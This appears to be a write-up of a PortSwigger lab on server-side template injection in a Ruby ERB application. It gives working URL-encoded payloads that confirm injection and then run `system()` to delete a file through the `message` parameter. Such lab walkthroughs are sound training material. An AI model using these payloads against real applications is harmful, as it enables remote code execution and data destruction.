[This lab](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic) demonstrates a **server-side template injection (SSTI)** vulnerability in a Ruby-based web application using the **ERB** templating engine. User input is dynamically inserted into an ERB template without sanitization, allowing arbitrary Ruby code execution.
In real-world scenarios, SSTI can lead to **full remote code execution**, file manipulation, or sensitive data exposure — depending on the templating language and context.
##### Step-by-Step Exploitation
###### 1. Identify the Injection Point
Clicking on a product with no stock triggers a message like:
```
Unfortunately this product is out of stock
```
This message is likely inserted using ERB into the HTML response, with a `GET` request like:
```
https://YOUR-LAB-ID.web-security-academy.net/?message=Unfortunately+this+product+is+out+of+stock
```
###### 2. Confirm Template Injection
Inject a simple Ruby expression:
```
<%= 7*7 %>
```
URL-encode it:
```
<%25%3d+7*7+%25>
```
Payload in URL:
```
https://YOUR-LAB-ID.web-security-academy.net/?message=<%25%3d+7*7+%25>
```
When visited, the page renders:
```
49
```
This confirms successful template injection and code execution.
![[CleanShot 2025-05-05 at 13.09.49.png]]
---
##### 3. Execute Arbitrary Command
Use Ruby’s `system()` function to execute OS commands. Construct a payload to remove the target file:
```erb
<%= system("rm /home/carlos/morale.txt") %>
```
URL-encoded:
```
<%25+system("rm+/home/carlos/morale.txt")+%25>
```
Final payload:
```
https://YOUR-LAB-ID.web-security-academy.net/?message=<%25+system("rm+/home/carlos/morale.txt")+%25>
```
Visit this URL in your browser. If successful, the file is deleted and the lab is marked as **Solved**.
![[CleanShot 2025-05-05 at 13.10.27.png]]